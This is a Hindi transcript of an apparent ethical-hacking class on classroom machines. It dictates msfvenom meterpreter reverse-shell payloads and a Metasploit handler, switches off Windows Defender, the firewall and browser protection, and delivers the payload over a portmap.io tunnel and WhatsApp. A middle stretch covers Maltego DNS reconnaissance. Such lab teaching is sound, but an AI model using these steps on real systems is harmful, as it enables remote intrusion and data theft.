ओके अपनी स्क्रीन मैम शेयर मैम वो अभी तक है ना पिंग नहीं हो रहा है मेरा। करिए, पिंग नहीं हो रहा है क्या? अच्छा वो एक बार शो करिए, देखते हैं अभी। पिंग भी नहीं हो रहा है और मैम वो अपना ठीक है महेश, इसमें करिए सूडो पास डालिए, आफ्टर दैट आप पिंक कर लीजिए। बस एक बार चेक कर लीजिएगा आईपी करेक्ट है कि नहीं। हाँ मैम वही स्क्रॉल अप करेगा, ये वीएम नेट 8 की है ना, ऊपर जाए। ओके और ऊपर करिए 1.107, इसको करिए 192.168 1.107। ठीक है, वो आप जो पिंग कर रहे हैं वो वीएम नेट के अडेप्टर की आईपी पिंग कर रहे हैं, जो हमारा वर्चुअल बॉक्स है ना उसमें जितने नेट अडेप्टर है अच्छा उसकी, तो इसलिए वो ले नहीं रहा ओके है। ठीक मैम। है, और कोई डाउट है प्रीवियसली में? ठीक नहीं नहीं है, नहीं तो आज हम बताइए। लोग जो अपना स्टार्ट करेंगे वो विंडोज हैकिंग को शुरू करेंगे। ठीक है, विंडोज हैकिंग जो हम लोग फर्स्टली करेंगे वो अभी हम लोग काली की हेल्प से करेंगे। ठीक है, काली की हेल्प से हम ओके पेलोड बनाएंगे और वो अपनी मेन विंडो में उसको भेज देंगे, उसके बाद देखेंगे हमको मिल रहा है कि नहीं। फर्स्ट पार्ट ये यस रहेगा, मैम। आफ्टर दैट मैं आपको लोकल की बात कराऊंगी जो हमारा वैन में होगा। तो अपना टर्मिनल ऑन करिए, मैं आपको कमांड बोलती चलती हूँ, आप बनाइए पेलोड। फिर सबसे पहले डेस्कटॉप पे आइए, सुडो बैश कर लीजिए, पासवर्ड डालिए, डेस्कटॉप पे आइए। यहाँ टाइप करिए MSF Venom -p स्पेस विंडोज स्लैश मीटर पीटर स्लैश मीटर पीटर METERPRETER PRE स्लैश रिवर्स अंडरस्कोर TCP SE, हाँ अंडरस्कोर TCP स्पेस एल होस्ट इज इक्वल्स टू, यहाँ पे काली की आईपी आएगी तो एक टर्मिनल ऑन करिए, काली की आईपी चेक करिए क्या है, वो यहाँ पे डाल दीजिए। और एक और ओपन आईओ का करूँ टर्मिनल ऑन कर लीजिए, यहाँ पे डायरेक्टली लिख लीजिए आईएफ कॉन्फिग। ये 1.112 ठीक है, 1.112 ये आपको डालने हैं, 192.168 1.112 स्पेस एल पोर्ट, एल पोर्ट में आप कोई भी पोर्ट नंबर ले सकते हैं, इज इक्वल्स टू 4545 या जो भी आपको लगे। स्पेस हाइफन एफ स्पेस exe स्पेस ग्रेटर देन साइन, फाइल का नेम लिख दीजिए जो भी आपको फाइल का नेम देना है, डट डॉट exe दे दीजिएगा फाइल का एक्सटेंशन। मैं कोई भी फाइल का नेम तो लिखिए। अच्छा ठीक हेलो ठीक है, एंटर। वो नाम का फाइल बनेगा ना हाँ उस नाम का फाइल बनेगा हमारे डेस्कटॉप का, एंटर कर दीजिए। एंटर हमारा 2 से 3 मिनट अभी लेगा हमारा पेलोड जनरेट करने के लिए।
ठीक है, इसका साइज आ गया फाइनल सा, दैट मींस इसका पेलोड बन गया। ठीक है, नेक्स्ट कमांड है हमारी एमएसएफ कंसोल। एमएसएफ कंसोल जो हम कमांड यूज करते हैं वो इसलिए करते हैं ताकि, एंटर कर दीजिए, ताकि आपको एक फ्रेमवर्क मिल जाए जहां पे अपने आगे की मल्टी कमांड्स लिखेंगे उसके लिए। यहाँ पे लिखिए यूज स्पेस एक्सप्लॉइट एक्सप्लॉइट स्लैश मल्टी, स्पेस नहीं देना, स्लैश मल्टी स्लैश हैंडलर, हैंडलर एच एन डी ना। एंटर। यहाँ लिखिए सेट स्पेस पेलोड स्पेस विंडोज स्लैश मीटर पीटर स्लैश रिवर्स अंडरस्कोर टीसीपी। रिवर्स अंडरस्कोर टीसीपी। रिवर्स अंडरस्कोर अंडरस्कोर ना, जो माइनस वाला होता है। हाँ, स्लैश हटा दीजिए फिर रिवर्स के बाद वाला। एंटर। देन सेट एल होस्ट स्पेस आईपी 192.168.1.112। इक्वल टू नहीं देना है यहाँ पे स्पेस देना है। 1.112। एंटर। सेट एल पोर्ट 4545 जो हमारा पोर्ट नंबर था। सेट एसईटी एंटर। अब हमको क्या करना है, फाइल को पहले शेयर करना है अपनी मेन विंडो में। तो एक और टर्मिनल ओपन करिए और अपना एक लोकल सर्वर स्टार्ट करिए पाइथन का। सबसे पहले सूडो बैश और अपने डेस्कटॉप पे जाइए, उसके बाद कमांड रन करना। सीडी डेस्कटॉप यहाँ पे अपने लोकल सर्वर स्टार्ट करना है। लोकल सर्वर जो होता है हमारा पाइथन का सर्वर होता है। तो यानी कि पाइथन स्पेस हाइफन एम स्पेस हाइफन एम स्पेस सिंपल एचटीटीपी सर्वर। सिंपल का एस कैपिटल होगा, एचटीटीपी पूरा कैपिटल होगा विदाउट स्पेस। एचटीटीपी कैपिटल होगा ना। सर्वर का एस कैपिटल। हाँ, फिर सर्वर लिख दीजिए स्पेस 8000। हाँ, एंटर। अपनी मेन विंडो में जाइए। विंडोज 10 यूज कर रहे हैं आप? विंडोज 8। अच्छा ठीक है, तो अपना फायरवॉल और डिफेंडर जो भी है उसको ऑफ कर दीजिएगा। विंडोज सिक्योरिटी में जाइए, फायरवॉल वगैरह ऑफ होना चाहिए क्योंकि फिर वो उसको डिटेक्ट कर लेता है ना। यहाँ से रियल टाइम प्रोटेक्शन ऑन है ना, उस पर क्लिक करके उसको ऑफ करिए। क्लिक हो रहा है इस पर रियल टाइम प्रोटेक्शन पे? नहीं, नहीं हो यहाँ से आ रहा है, इस पर क्लिक करिए। सेटिंग्स में जाके जो आ रहा था रियल टाइम प्रोटेक्शन वहां से हो जाएगा। यहाँ से टर्न ऑफ फायरवॉल करिए पहले। राइट में इधर आ रहा है लेफ्ट हैंड साइड में थर्ड नंबर। हाँ, इस पर क्लिक करके टर्न ऑफ पर क्लिक करिए। ये तो हो गया, ये तो हो गया टर्न ऑफ। ठीक है, बैक आ जाइए ओके करके। और जो अभी आपने खोला था सिक्योरिटी उस पर जाइए, वहां से आपका वो ऑफ हो जाएगा रियल टाइम। सेटिंग्स पे जाइए। यहाँ पर रियल टाइम आ रहा है साइड में, इस पर क्लिक करिए।
टर्न ऑफ कर दीजिए। हाँ सेव चेंजेस, ठीक है। अब अपने ब्राउजर में आइए और अपने काली की आईपी सर्च करिए विद पोर्ट नंबर 8000 ब्राउजर में। पोर्ट नंबर का स्लैश मार के लिखूं? नहीं, कोलन लगा के। कोलन लगाइए, डबल डॉट जो होता है। 8000 मिल गया mac.exe। अब इसको डाउनलोड कर लीजिए। ये डिस्कार्ड कर रहा है, क्रोम ब्लॉक कर रहा है, ठीक है। क्रोम की सेटिंग्स में जाइए, यहाँ से यहाँ सेटिंग्स, यहाँ सिक्योरिटी करके होगा, प्राइवेसी एंड सिक्योरिटी, थर्ड नंबर। हाँ सिक्योरिटी पे क्लिक करिए, स्क्रॉल डाउन, टर्न ऑफ, स्क्रॉल डाउन करिए। हाँ ये नो प्रोटेक्शन आ रहा ना। हाँ ये डाउनलोड कीप। हाँ अभी डाउनलोड हो चुका है, अभी इसको रन मत करिएगा, पहले काली में जाके रन लिख दीजिए अपने टर्मिनल पर जहाँ हमने बनाया था ना वहाँ पे। यहाँ नहीं, इससे दूसरा वाला टर्मिनल जो था उसे ऑन करिए, ऊपर वाला है, सबसे ऊपर वाला है। हाँ ये वाला, इसमें रन लिख दीजिए, उसके बाद जाके अपने उसको रन कराइए, एंटर। वहां पर जाके रन करा दीजिए उसको। इसको शो इन फोल्डर कर लीजिए, तब रन करा दीजिए, नहीं तो कैसे भी डबल। मोर इन्फो पर क्लिक करिए, डबल क्लिक करने के बाद रन है नहीं, ठीक है। अपना काली में जाइए, क्योंकि रन होकर कुछ देखेगा तो है नहीं, ठीक है। यहाँ मीटर पीटर आ गया, मीटर पीटर का मतलब है कि आपने उसको एक्सेस कर लिया। अब अगर आपको देखना है कि आप एग्जैक्टली कहाँ प्रेजेंट है तो PWD यूज करिए। कहाँ है आप? यूजर्स के अंदर मेश फाइल डाउनलोड। आपको अगर अपनी फाइल देखनी है तो आप कौन सा कमांड चलाएंगे? विंडोज के लिए ना। अगर आपको देखना है कि मेरी कौन कौन सी फाइल है, या तो काली में काम कर रहे हैं तो आप एलएस करिए। एलएस करने के बाद जितनी भी आपके डाउनलोड्स में फाइलें हैं सारी ये फाइल यहाँ आ रही है। आ रही है? यस मैम। और अभी कोई इन्फॉर्मेशन देखनी है तो आप देखिए, जैसे मान लीजिए आपको एक स्टेप बैक आना तो cd:// तो आप जहाँ डाउनलोड्स थे वहाँ आप महेश पाटिल वाले फोल्डर में आ जाएंगे। एंटर करिए, यहाँ पे एलएस करके देखिए आप कौन कौन से फोल्डर है। तो एक तरीके से कि आपकी पूरी विंडोज हैक हो चुकी है, ठीक है। उसकी वजह से जैसे उसने रन कर दिया। अब ये वाला काम क्या था जो हमने किसमें करा? लोकल होस्ट में करा है, ठीक है। अगर हम चाह रहे हैं कि हम कैसे करें, वैन में करें, दैट मीन्स अगर आपकी पेलोड मुझे भेजें तो मेरे में भी आप सेम फंक्शनिंग परफॉर्म कर पाए। तो उसके लिए क्या करना होता है ना, हमको पोर्ट मैप पे अकाउंट बनाना होता है। तो आप एक काम करिए, काली के अंदर ही ब्राउजर ओपन करिए और portmap.io। कमांड्स मैं आपको दे दूंगी, आप प्रैक्टिस कर लीजिएगा ताकि कल मैं एक बार आपसे पहले कराऊंगी ना, फिर नेक्स्ट पढ़ेंगे। ब्राउजर में सर्च करिए, हाँ यहाँ पर सर्च करिए portmap.io। आयु ना जी, portmap.io। इसमें रजिस्टर करिए, ऊपर ही आ रहा रजिस्टर ना, कॉर्नर में। हाँ यहाँ अपनी मेल आईडी डाल के रजिस्टर करिएगा। लॉगिन में कोई भी नेम डाल दीजिए, बट नेम के अंदर अंडरस्कोर डाल दीजिएगा, जैसे महेश_पाटिल डाल दीजिए, कोई भी नंबर जो आपको ठीक लगे।
महेश में एच एस रह गया, ठीक है याद रखना। ठीक है, ईमेल एड्रेस डालिएगा करेक्ट वाला, क्योंकि ये वो भेजता है एक्टिवेशन लिंक। जीमेल रह गया। एग्री करिए टर्म्स एंड कंडीशन, नॉट अ रोबोट रजिस्टर। ठीक है, अपने एक्टिवेशन लिंक पर जाके क्लिक करके आइए। कर ओपन दिया, तो कर दें तो आप मुझे बताइएगा, फिर आगे प्रोसेस करते हैं। हम इसमें लॉगिन का ऑप्शन है, लॉगिन करो इसमें। नहीं, आपको वहां लॉगिन नहीं करना है, आप थोड़ा सा स्क्रॉल अप करिए, यहाँ पे स्क्रीन पे ना कॉन्फ़िगरेशन होगा ऊपर, उस पर क्लिक करना है आपको, ऊपर ऊपर ऊपर। हाँ कॉन्फ़िगरेशन आ रहा ना, हाँ यहाँ पर क्लिक कर दीजिए। अब यहाँ पर क्रिएट न्यू कॉन्फ़िगरेशन, यहाँ पे यूडीपी आ रहा है ना, उसको चेंज करके टीसीपी कर दीजिए, क्योंकि टीसीपी क्या होता है, हमको कैसा कनेक्शन देता है, एंड टू एंड इंक्रिप्शन और कनेक्शन एंड देता है। यूडीपी हमको नहीं चाहिए, क्योंकि हम क्या चाह रहे हैं, हमको एंड टू एंड कनेक्शन मिले। अब थोड़ा स्क्रॉल डाउन करके डाउनलोड का ऑप्शन आ रहा है, आप डाउनलोड कर लीजिए, मतलब जनरेट करके फिर डाउनलोड, पहले जनरेट फिर डाउनलोड। क्या डाउनलोड सेव करिएगा फाइल को। है, ठीक है, इसको ओपन नहीं करना है, स्क्रॉल अप करके मैपिंग रूल्स पे आ जाइए। मैपिंग मैपिंग रूल्स, यहाँ पर मैपिंग रूल हमको क्रिएट करना है। मैंने गलती से ऊपर कर दिया, इसको मिनिमाइज कर दूँ। इसको तो बंद कर दीजिए, इसका काम ही नहीं है, मिनिमाइज भी नहीं, बंद कर दीजिए। मैपिंग रूल्स पे क्लिक करना है,
we can create new rule. यहाँ पे पोर्ट मैप होस्ट नेम में आ रहा है ना, पोर्ट मैप में इसके बाद उस पर जरा क्लिक करी, पोर्ट मैप डॉट आईओ चूज करना है इसमें ऊपर वाला, ठीक है। यहाँ पे क्या है, पोर्ट ऑन योर पीसी लास्ट सेकंड कॉलम, इसमें हमको कोई भी एक पोर्ट नंबर चूज करना होता है। पहले आप मुझे बताइए पोर्ट नंबर क्या होते हैं, मैंने आपको बताए थे पोर्ट नंबर में वो प्रोटोकॉल के लिए है, मतलब कौन सा प्रोटोकॉल हम लोग यूज करेंगे, जैसे टीसीपी आईपी। हां दैट मींस दीस आर द एग्जिट एंड एंट्री पॉइंट्स वेयर वी हैव टू कनेक्ट। ओके तो पोर्ट नंबर की टोटल रेंज क्या थी, 0 से लेकर 63000 समथिंग। ठीक है, 65535, तो 0 से लेके 1023 तो रिजर्व होते हैं, तो आप उसके बाद का कोई भी पोर्ट नंबर चूज कर सकते हैं अपने लिए, तो आप चूज कर लीजिए जो भी आपको ठीक लगता है। 6566 एनीथिंग जो तो आपको ठीक लगे वो। हाँ ठीक है, याद रखिएगा वो 6523 क्योंकि हमको आगे यूज करने हैं, ठीक है। तो ऐसा रखिए या तो जो आपको याद रहे टिप पे, नहीं तो ओपन कर लीजिएगा हर बार मैपिंग रूल्स, कोई इशू नहीं है, क्रिएट कर दीजिए। की किस चीज की एक्टिवेट करने के लिए, कहाँ पे, मोबाइल में मेल्टेगो में अच्छा, माल्टेगो में भी आपका रन कराती हूँ, एक मिनट रुकिए। चलिए ठीक है, मैपिंग रोल क्रिएट हो गया, आप एक काम करिए इसको भी मिनिमाइज रखिए, माल्टेगो ओपन कर लीजिए पहले, माल्टेगो रिजॉल्व कराती हूँ फिर आगे बढ़ते हैं। इसमें क्या सेलेक्ट करूं, इसमें आप स्क्रॉल डाउन करिए, एक फ्री वाला होगा, इसमें से कोई भी एक्टिवेशन वाला नहीं लेना आपको, थोड़ा सा स्क्रॉल डाउन करिए, डाउन करिए ना आप, राइट लेफ्ट कर रहे हैं, ये वाला रन करिए माल्टेगो ये वाला, नहीं नहीं इससे ऊपर वाला, केस फाइल नहीं ऊपर वाला, हाँ इसको रन करिए। ठीक है, हाँ वेट करिए। स्क्रॉल अप वगैरह करके देख लो, ये एंड में आ जाता है ना, थोड़ा सा ऊपर करो स्क्रीन को, राइट लेफ्ट नहीं ऊपर, कभी कभी पूछता है। हाँ यहाँ पे अपना ईमेल एड्रेस डालिए, अपना पास, अगर आपने रजिस्टर कर रखा है यहाँ पे, नहीं मैम कुछ नहीं किया मैंने, हाँ तो रजिस्टर हियर पर क्लिक करिए पहले, फिर यहाँ पे, हाँ फर्स्ट नेम लास्ट नेम मोबाइल नंबर और रजिस्टर करिए। कंट्री कोड डालना है मैम, नहीं प्लेन नंबर डाल दीजिए, अगर कुछ एरर देगा ना तब डाल देंगे। ईमेल डालिए, ठीक
तेल गया होगा, उसको भी कंफर्म करके आई, मोबाइल से कर लीजिए कंफर्म। हो गया इसको कट करके, तो अपने उसमें जाइए जहाँ पे हमको मेल डालना था ना, यहाँ पे अपने ईमेल एड्रेस पासवर्ड और इस कैप्चा को डाल दीजिए। नेक्स्ट जी नेक्स्ट करने के बाद माल्टा को नॉट फाउंड यूजर, पासवर्ड एंटर जो डाला वो आपने इनकरेक्ट डाला, पासवर्ड बैक आओ, दोबारा डालो पासवर्ड। आईडी ठीक है ना ईमेल आईडी? हाँ मैम जी, 8x9 है। नेक्स्ट ठीक है, ओके नेक्स्ट करिए। ये जो वैलिड रहेगा 1 नवंबर तक रहेगा, ठीक है, फिर दोबारा से इस पर क्रिएट करना पड़ेगा इस अगर, क्योंकि हम लोग फ्री अकाउंट यूज कर रहे हैं। नेक्स्ट करिए। नेक्स्ट नेक्स्ट करो क्या बॉक्स में, नेक्स्ट करो। नेक्स्ट करी, शो नहीं कर रहा ना कुछ, इसको स्क्रॉल अप वगैरह करके देख लीजिएगा ऊपर कुछ आ रहा हो। ठीक है नेक्स्ट फिनिश कर दीजिए। ठीक है माल्टा को चल गया, अब यहाँ पे इसको कट कर दीजिए, जो आपका पीछे वाले स्क्रीन पर क्लिक कर दीजिए, कुछ नहीं आ रहा तो नहीं, पीछे वाले स्क्रीन पर कहीं भी क्लिक कर दीजिए, ऐसे नहीं हटेगा ये। ये पीछे आपको वो आ रहा है सर्कल सर्कल से शुरुआत में, हाँ ठीक है पीछे सर्कल सर्कल से आ रहे हैं शुरुआत में, तीन जो आ रहे हैं एक बॉक्स में बने हुए, कहाँ है अभी इसके पे बराबर में आ रहा है प्लस का आइकन, हाँ ये आपका न्यू ग्राफ के लिए होता है, इस पर क्लिक करिए। एक्नॉलेज करूँ क्या एक्नॉलेज पर क्लिक करके बंद कर दीजिए, कोई बात नहीं। ठीक है प्लस के आइकन पर क्लिक करिए, यहाँ पे न्यू ग्राफ के लिए होता है, इस पर क्लिक करके न्यू ग्राफ ले लीजिए।
यहाँ से हमारा न्यू ग्राफ आता है, ठीक है। अभी साइड में आपने देखा होगा डिवाइसेस आ रहे हैं, इवेंट्स आ रहे हैं ना, इसको थोड़ा सा स्क्रॉल डाउन करिए, यहाँ पे डोमेन का ऑप्शन आएगा, तो आपको डोमेन को ड्रैग एंड ड्रॉप करना है। डोमेन को उठाइए और यहाँ पे ड्रॉप कर दीजिए। दोबारा करिए, नहीं लिया है तो। ये पर्टिवा डॉट कॉम आ गया। पर्टिवा डॉट कॉम का मतलब है जो माल्टेगो की कंपनी है ना, उसका डोमेन है ये। सपोज करिए हमें लेकिन किसी और डोमेन के बारे में इंफॉर्मेशन चाहिए, तो आप क्या करिए, पर्टिवा जहाँ लिखा उस पर डबल क्लिक करके उसका डोमेन नेम चेंज कर दीजिए। सपोज गूगल डॉट कॉम, यूट्यूब डॉट कॉम, जिसके बारे में भी हमको इन्फॉर्मेशन चाहिए, एंटर कर दीजिए। अब हमें क्या करना है, इसके बारे में इन्फॉर्मेशन लेनी है, तो जहाँ ये ब्लू कलर की बॉल टाइप आ रहा है, इस पर राइट क्लिक करिए। ये वाली नहीं, ये जो पर्टवा पेज आ रही है, हाँ यही गूगल डॉट कॉम की, हाँ ये राइट क्लिक करिए। सपोज करिए आपको किसी के डीएनएस के बारे में इन्फॉर्मेशन चाहिए, तो डीएनएस पे क्लिक कर दीजिए। अब किसके बारे में चाहिए, डीएनएस नेम के बारे में चाहिए, कि उसके जोन के बारे में चाहिए, कि किसके बारे में, तो एनएस या किसी पे भी, नंबर वन नंबर टू किसी पे भी एक पर क्लिक करिए। एमएक्स पे कर दिया, दैट मींस के जितने भी एमएक्स प्लेयर, जितने भी हमारे पास नेम सर्वर, सबके बारे में इंफॉर्मेशन आए। तो ये रनिंग मोड में चल रहा है, ठीक है। रनिंग मोड में चलने के बाद क्या है कि ये आपको सारा एक वो बना के दे देगा। दो चार मिनट वेट करिए, टेबल है, एक मिनट दीजिएगा, बस एक कॉल पे कर दीजिए। ठीक है, आपके पास इन्फॉर्मेशन आ गई, आपके जितने भी एमएक्स प्लेयर जो इसके गूगल के साथ एसोसिएट थे, इसने सारे सबकी लाइन दे दी, ठीक है। तो एज अ फॉर्म ऑफ ग्राफ में इसने हमें डिस्क्राइब किया है। तो अगर मान लो अगर यही वाले ग्राफ आपको कहीं इंपोर्ट करने हैं, या सपोज आपको क्या करना है, सेव करना है, क्योंकि ऐसा तो है नहीं कि हम यहाँ से कॉपी पेस्ट करके वर्ड फाइल में पेस्ट करेंगे, ठीक है, वो चीज तो पॉसिबल हो ही नहीं पाती है। तो आपको क्या करना, अगर यहाँ से सेव करना है कुछ है, तो आप इसको क्या कर सकते हैं, आप इसको इम्पोर्ट भी कर सकते हैं। इम्पोर्ट एक्सपोर्ट दोनों ऑप्शन आपके स्क्रीन पे आ रहे हैं। इफ अगर आपको इम्पोर्ट करना है, तो क्लिक ऑन द इम्पोर्ट, ये फाइल सेव हो जाएगी, जिसको भेजनी है आप उसको भेज सकते हैं, रिलेटेड टू दिस जो भी आपको बनाना है।
ठीक है, तो इस तरीके से आपका माल्टेक वर्क करता है आपकी इन्फॉर्मेशन गैदरिंग के लिए। बट बेसिकली जो इन्फॉर्मेशन गैदरिंग होती है वो मैंने आपको फुटप्रिंटिंग और इन्फॉर्मेशन गैदरिंग के सारे टूल्स बताए थे। लेकिन अगर हमको कोई ग्राफ के फॉर्म में प्लॉट करना है या फिर एक प्रेजेंटेशन के फॉर्म में देना है तो हम तब जाके माल्टेको यूज करते हैं। माल्टेको काफी ज्यादा ही आप कह सकते हैं स्पेशल या फिर आप कह सकते हैं थोड़ा इंपॉर्टेंट टाइप ऑफ टूल है, क्योंकि अगर आप इथिकल हैकिंग के बाद अगर वेब पेनिट्रेशन टेस्टिंग में करना चाहेंगे तो वेब पेनिट्रेशन टेस्टिंग में मोस्टली जो यूज होता है वो माल्टेको या फिर हार्वेस्टर या कुछ इस तरीके के टूल, शोडान होता है, ये इस तरीके के कुछ टूल्स यूज होते हैं जो थोड़े हाइयर फॉर्म के लिए होते हैं। बट इथिकल हैकिंग हमारा बेसिक है तो हम लोग बेसिक के टाइम पे वो यूज कर लेते हैं अपने नॉर्मल टूल्स। ठीक है, अब आप इसको क्लोज कर सकते हैं, हमारा अकाउंट बन गया है ना, पूरा डन हो गया। सेव करना चाहें सेव, नहीं तो डिस्कार्ड कर दीजिए। ठीक है, टर्मिनल ऑन, ठीक है वो हो गया। अब क्या करना है ना, अब अगर मान लीजिए आप पेलोड बनाना चाहते हैं विद द हेल्प ऑफ अपना वैन, दैट मींस आप चाहते हैं कि आप वो पेलोड मुझे शेयर करें बना के, कमांड सेम रहेंगी, कुछ डिफरेंट नहीं आता है। बस डिफरेंस कहाँ आएगा, आईपी के केस में आएगा। क्यों? क्योंकि इस बार जो हम आईपी यूज करेंगे वो हम पोर्ट मैप वाली आईपी यूज करेंगे। अब हम ये वाली आईपी यूज नहीं कर सकते क्योंकि जो आपने अभी आईपी यूज करी थी वो आपकी लोकल आईपी थी। ठीक है, अभी तक कोई डाउट तो नहीं है कैसे पेलोड बनाया था? ठीक है, तो आप क्या करिए, आप टर्मिनल ऑन करिए, पुराना वाला टर्मिनल क्लोज कर सकते हैं, उसकी हमको नीड नहीं है। एक न्यू फ्रेश टर्मिनल ऑन करिए, जो पुराने खुल रहे हैं उनको बंद कर दीजिए क्योंकि फिर कंफ्यूजन रहा आएगा, तीन खुले हुए हैं ऑलरेडी। ऊपर आ रहा है टर्मिनल को, ठीक है। अब यहाँ पे आप सुडोवेश लिखिए, पासवर्ड दीजिए, डेस्कटॉप पे आ जाइए। ठीक है, यहाँ पे सबसे पहले कमांड, नहीं डेस्कटॉप पे नहीं, आप एक स्टेप बैक जाके डाउनलोड्स में आइए, क्योंकि डाउनलोड्स में आपकी फाइल है जो आपने डाउनलोड की थी, सीडी स्पेस डॉट डॉट। डाउनलोड्स का डी कैपिटल, यहाँ पे एलएस करिएगा, यहाँ पे आपकी फाइल होगी जब मैं भी डाउनलोड कराई थी ना मैंने, हाँ यही है। ठीक है, यहाँ पे क्या करना, आप टाइप करिए कमांड ओपन वीपीएन स्पेस हाइफन हाइफन कॉन्फिग स्पेस फाइल नेम स्पेस ये वाला ही फाइल नेम महेश करके जो आ रहा है ना, जैसे ये लिखा है वैसे लिखना है। ये हम लोग जो कमांड यूज कर रहे हैं ओपन वीपीएन हाइफन हाइफन कॉन्फिग, इसका मतलब है हम एक टनलिंग बना रहे हैं। टनलिंग मतलब ये स्टार्ट रहेगी तो इसके थ्रू जो हमको आईपी मिलेगी वही आईपी हमारे लिए जरूरत होगी अगर आपको किसी और का सिस्टम हैक करना है जो आपके नेटवर्क में नहीं है। एंटर करिए, एंटर करने से ही आपको एक आईपी देगा, आपको आईपी होप सो दिख रही होगी 193.161.193.99 ऊपर वाले में ही सेकंड लाइन में। ठीक है, ये वाली आईपी अब आपको अपने पोर्ट मैप में जहां से आप बनाएंगे एमएस वेनम करके ना वहां यूज करनी है। तो एक नया टर्मिनल ऑन करिए, सूडो वैश करिए, डेस्कटॉप पे आइए और एमएस वेनम वाली कमांड से पेलोड बनाइए, ये चलता रहेगा, इसको मिनिमाइज करना, ऑफ नहीं करना क्योंकि आपकी टनलिंग है, ये ऑन रहेगी। बंद तो नहीं की ना? नहीं, ठीक है, डेस्कटॉप पे बना लीजिए, शेयर करने में इजी रहेगा। ठीक है, यहाँ पे कमांड लिखिए एमएसएफ वेनम स्पेस हाइफन पी स्पेस विंडोज स्लैश मीटर पीटर स्लैश रिवर्स अंडरस्कोर टीसीपी।
स्पेस एल होस्ट स्पेस एल होस्ट के बाद सॉरी इज इक्वल्स टू दीजिए स्पेस नहीं हाँ 193.161.193.99 स्पेस एलपोर्ट आपको वो देना जो आपने वहां दिया था आपको याद है कुछ पोर्ट में आपका नहीं याद है तो पोर्ट में ओपन करिए आई थिंक 6520 या कुछ ऐसा दिया था मुझे याद नहीं चेक कर टू थ्री था 20 था मुझे डाउट हो रहा है एक बार चेक फायरफॉक्स ओपन है देख ही लीजिए ना बनाने में गड़बड़ हो जाएगी फायरफॉक्स ओपन कर एक नया टैब ओपन करिए पोर्ट मैप डॉट आईवी डालिए फिर लॉग इन कर लीजिए मुझे ऐसा लग रहा है 6520 कर दिया था शायद उस पर क्लिक करिए अपने नेम पे कॉर्नर में आ रहा है ना महेश पाटिल प्रोफाइल पे चले जाइएगा फिर नेम पे क्लिक करिए नेम आ रहा है ना आपका ये प्रोफाइल फिर मैपिंग रूल्स ऊपर ही आ रहा है मैपिंग रूल्स सिक्स फाइव टू जीरो है ना मैं कह रही थी ये देखिए 6520 आपका क्या है लोकल पोर्ट है और जो वो वाला पोर्ट है वो है 26057 तो आपको 26057 तो लेना है ऊपर और एक बार जो नीचे यूज होता है वहां पे 6520 लेना है उसको नहीं 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 इसको हटाइए इसको हटाइए हमको वो लेना है ना 6507 बता दो 26057 26057 ना स्पेस हाइफ़न एफ स्पेस ईएक्सी ग्रेटर देन साइन स्पेस ग्रेटर देन साइन फाइल का नेम दीजिए कोई भी डॉट ईएक्सी मैक मत दीजिएगा क्योंकि वो पहले से बना लिया ठीक है डॉट ईएक्सी एंटर कर दीजिए नेक्स्ट कमांड एमएसएफ कंसोल एंटर लेकिन यूज मल्टी स्लैश सॉरी यूज एक्सप्लॉइट स्लैश मल्टी स्लैश हैंडल यूज के बाद स्पेस दे दीजिए एक्सप्लॉइट के बाद स्लैश मल्टी देन स्लैश हैंडलर विदाउट स्पेस मल्टी स्लैश हैंडलर एच एन डी
आर हेलो एंटर देन सेट स्पेस पेलोड स्पेस विंडोज स्लैश मीटर ट्विटर स्लैश रिवर्स अंडरस्कोर टीसीपी सेम कमांड एंटर सेट एल होस्ट स्पेस सेम आईपी जो ऊपर दी थी 193.161.193.99 आपने सेट नहीं लगाया सेट एल होस्ट 193 के बाद दो डॉट लग गए अब ठीक है एंटर करूंगा हाँ एंटर कर दीजिए अब नेक्स्ट लिखिए सेट एलपोर्ट और इस बार एलपोर्ट में वो वाला आएगा 6520 वाला जो था ठीक है अब जो आपका पेलोड बना है आपके डेस्कटॉप पे ना आपको वो मुझे शेयर करना है विद द हेल्प ऑफ व्हाट्सएप तो अपना व्हाट्सएप यहाँ ओपन कर लीजिए फायरफॉक्स में जाके व्हाट्सएप वेब से और मुझे शेयर कर दीजिए गूगल से अगर ओपन है मेरा व्हाट्सएप आपको इधर यहाँ से से करना करना पड़ेगा ना क्योंकि काली में ही है ना आपका पेलोड ओके सर ठीक है ना तो मुझे व्हाट्सएप पे शेयर कर दीजिए हेलो हेलो निशा मैम यस महेश बोलिए यहाँ पे सेंड कर दीजिए आप पेलोड को हाँ इस पर क्लिक करिए जो फाइल का ऑप्शन आ रहा है ना हाँ ये इस पर थर्ड नंबर हाँ डॉक्यूमेंट से जाके उसको सिलेक्ट करके भेज दीजिए ये वाला ना मैम हाँ डेटा डेटा वाला हाँ मैं इसको डाउनलोड करती हूँ अपने सिस्टम में भी फिर आपको मीटर पीटर आ जाएगा वहां पे रन कर दीजिएगा जाके बाकी मैं भी डाउनलोड कर रही हूँ ओके
आपने रन लिख दिया है ना? ये वाला नहीं, इसको तो मिनिमाइज करिए, इसकी जरूरत नहीं, पीछे वाले पे कम करना। हाँ यार रन लिख दीजिए बस, अब मैं अपना पेलोड जो है वो रन कर रही हूँ बस, जो आपने मुझे भी सेंड किया। हाँ रन करके एंटर कर दीजिए। यहाँ पे रन नहीं करना है, दूसरा वाला टर्मिनल जो था उस पर करिए, ये तो हमारा वो है टनल है जिस पर आपने पेलोड बनाया था उस वाले पे। उस पे ना हाँ यहाँ पे रन करिए, एंटर करिए। मैं एक बार रन कर देती हूँ अपना वाला पेलोड अगेन। आपने देखा होगा सेंडिंग स्टेज आ रहा है, सेंडिंग स्टेज दैट मींस मेरा पेलोड रन हो चुका है, बस यहाँ पे आपको मीटर पीटर आएगा, वो थोड़ा इंटरनेट कनेक्टिविटी का है, एक आध मिनट में यहाँ पे मीटर पीटर शो कर जाएगा। मीटर पीटर शो करने का मतलब है कि आपने क्या करा, आपने हैक कर लिया। अब आप यहाँ पे पीडब्ल्यूडी करेंगे तो आप मेरे वाले के अंदर आएंगे। पीडब्ल्यूडी करिए, आप दिशा डाउनलोड्स के अंदर आ गए। ठीक है, अब यहाँ पे एलएस करिए, डाउनलोड्स के अंदर सारी फाइल्स आपको शो हो जाएंगी जो मेरे उसमें है। ठीक है, तो ये सारी हैकिंग है। क्लियर हुआ आपके पॉइंट्स, कैसे कैसे हमने किया है स्टेप्स? ठीक है, मैं आपको अभी रिकॉर्डिंग शेयर करती हूँ, तो आप एक बार प्रैक्टिस करिएगा। कल जब हम लोग कनेक्ट होंगे तो पहले आप मुझे मेरा सिस्टम अगेन हैक करके दिखाएंगे विद द 